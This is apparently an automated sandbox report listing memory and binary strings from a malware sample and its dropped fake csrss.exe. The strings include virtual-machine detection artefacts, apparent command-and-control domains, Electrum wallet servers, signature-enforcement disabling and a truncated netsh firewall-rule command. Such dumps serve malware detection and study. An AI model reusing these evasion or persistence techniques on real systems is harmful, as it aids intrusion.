ghzcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeMicrosoft Windows 10 ProC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrssaa3f8HKEY_USERS\S-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: vmhgfs$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp	Binary or memory string: ?advapi32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime3LFU_3R1OpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmk
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exewinlogon.exesharedintapp.exeservices.exesharedintapp.exelsass.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exesvchost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exe4t4y4r89uz.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: [system process]vboxtray.exe
Source: csrss.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: vmxnetvmx86$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp	Binary or memory string: systemvmsrvc.exe
Source: csrss.exe	Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: ><'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe	Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	Binary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	Binary or memory string: \\.\HGFS`
Source: svchost.exe, 00000002.00000002.546816375.00000286A1040000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.547367148.0000019AEA429000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: csrss.exe	Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: csrss.exe	Binary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
Source: csrss.exe	Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe4t4y4r89uz.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
Source: csrss.exe	Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327631474.00000000160DE000.00000004.00000001.sdmp	Binary or memory string: wtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exemsvmmoufShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exexenevtchn`'
Source: csrss.exe	Binary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	Binary or memory string: tvmhgfsQ
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: svchost.exe, 00000002.00000002.546609399.00000286A1002000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp	Binary or memory string: 